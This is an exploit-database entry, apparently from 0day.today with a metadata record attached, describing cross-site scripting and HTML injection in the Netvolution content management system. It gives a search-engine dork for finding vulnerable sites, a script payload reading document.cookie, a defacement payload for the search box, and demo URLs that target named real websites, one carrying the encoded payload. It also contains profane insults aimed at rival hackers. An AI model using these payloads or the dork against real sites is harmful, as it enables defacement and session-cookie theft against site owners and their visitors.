Netvolution Content Management System XSS/HTML Injection Vulnerability
2010-06-29T00:00:00
ID 1337DAY-ID-13067 Type zdt Reporter **RoAd_KiLlEr** Modified 2010-06-29T00:00:00
Description
Exploit for php platform in category web applications
======================================================================
Netvolution Content Management System XSS/HTML Injection Vulnerability
======================================================================
[+]Title Netvolution Content Management System XSS/HTML Injection Vulnerability
[+]Author **RoAd_KiLlEr**
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://a-h-crew.net
[~] Download App: http://www.netvolution.net/en/Netvolution-Content-Management-System
[~] Vendor: http://www.netvolution.net/
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Dork: allinurl:default.asp?pid= "la="
==========================================
[+]. XSS Vulnerability
=+=+=+=+=+=+=+=+=+
Go to any website and in the search box (its on top of webpage) put this code : "><script>alert(document.cookie)</script>
Dem0:
~~~~~
http://www.grnet.gr/default.asp?pid=85&la=2
[+]. HTML Injection
=+=+=+=+=+=+=+=+=+
This script is also Vulnerable to HTML Injection
For HTML injection Just put this code in the search Box : ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>
Dem0:
~~~~~
http://lerosmarina.gr/?option=contents&task=Search&lang=en&query=Search%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont+color%3DRed+size%3D16%3EXSS+by+%2A%2ARoAd_KiLlEr%2A%2A%3C%2Ffont%3E%3C%2Fh1%3E%3Cmarquee%3E
Or
http://www.grnet.gr/default.asp?pid=85&la=2
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail
| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
# 0day.today [2018-01-30] #
{"id": "1337DAY-ID-13067", "lastseen": "2018-01-30T11:01:10", "viewCount": 4, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-30T11:01:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/WD_MYCLOUD_MULTIUPLOAD_UPLOAD", "MSF:EXPLOIT/LINUX/HTTP/RANCHER_SERVER", "MSF:EXPLOIT/LINUX/HTTP/DLINK_DIR850L_UNAUTH_EXEC", "MSF:EXPLOIT/LINUX/HTTP/UEB9_API_STORAGE", "MSF:EXPLOIT/UNIX/WEBAPP/WP_PHPMAILER_HOST_HEADER", "MSF:AUXILIARY/ADMIN/HTTP/SUPRA_SMART_CLOUD_TV_RFI", "MSF:EXPLOIT/LINUX/MISC/QNAP_TRANSCODE_SERVER", "MSF:EXPLOIT/LINUX/HTTP/UEB_API_RCE", "MSF:EXPLOIT/UNIX/HTTP/SCHNEIDER_ELECTRIC_NET55XX_ENCODER", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/CORELPDF_FUSION_BOF"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1058-1.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13067", "SECURITYVULNS:DOC:13067"]}], "modified": "2018-01-30T11:01:10", "rev": 2}, "vulnersScore": 0.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/13067", "description": "Exploit for php platform in category web applications", "title": "Netvolution Content Management System XSS/HTML Injection Vulnerability", "cvelist": [], "sourceData": "======================================================================\r\nNetvolution Content Management System XSS/HTML Injection Vulnerability\r\n======================================================================\r\n\r\n[+]Title Netvolution Content Management System XSS/HTML Injection Vulnerability\r\n[+]Author **RoAd_KiLlEr**\r\n[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws\r\n[+]Tested on Win Xp Sp 2/3\r\n---------------------------------------------------------------------------\r\n[~] Founded by **RoAd_KiLlEr**\r\n[~] Team: Albanian Hacking Crew\r\n[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws \r\n[~] Home: http://a-h-crew.net \r\n[~] Download App: http://www.netvolution.net/en/Netvolution-Content-Management-System\r\n[~] Vendor: http://www.netvolution.net/\r\n==========ExPl0iT3d by **RoAd_KiLlEr**==========\r\n\r\n\r\n[+] Dork: allinurl:default.asp?pid= \"la=\"\r\n\r\n==========================================\r\n\r\n\r\n[+]. XSS Vulnerability\r\n=+=+=+=+=+=+=+=+=+\r\n\r\nGo to any website and in the search box (its on top of webpage) put this code : \"><script>alert(document.cookie)</script>\r\n\r\nDem0:\r\n~~~~~\r\nhttp://www.grnet.gr/default.asp?pid=85&la=2\r\n\r\n\r\n\r\n[+]. HTML Injection\r\n=+=+=+=+=+=+=+=+=+\r\n\r\nThis script is also Vulnerable to HTML Injection\r\n\r\nFor HTML injection Just put this code in the search Box : \">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee>\r\n\r\nDem0:\r\n~~~~~\r\nhttp://lerosmarina.gr/?option=contents&task=Search&lang=en&query=Search%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont+color%3DRed+size%3D16%3EXSS+by+%2A%2ARoAd_KiLlEr%2A%2A%3C%2Ffont%3E%3C%2Fh1%3E%3Cmarquee%3E\r\n\r\nOr\r\n\r\nhttp://www.grnet.gr/default.asp?pid=85&la=2\r\n\r\n\r\n\r\n\r\n===========================================================================================\r\n[!] Albanian Hacking Crew \r\n===========================================================================================\r\n[!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;)\r\n===========================================================================================\r\n[!] MaiL: sukihack[at]gmail[dot]com\r\n===========================================================================================\r\n[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers \r\n===========================================================================================\r\n[!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail \r\n| NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends\r\n===========================================================================================\r\n[!] Red n'black i dress eagle on my chest\r\nIt's good to be an ALBANIAN\r\nKeep my head up high for that flag I die\r\nIm proud to be an ALBANIAN\r\n===========================================================================================\r\n\r\n\n\n# 0day.today [2018-01-30] #", "published": "2010-06-29T00:00:00", "references": [], "reporter": "**RoAd_KiLlEr**", "modified": "2010-06-29T00:00:00", "href": "https://0day.today/exploit/description/13067"}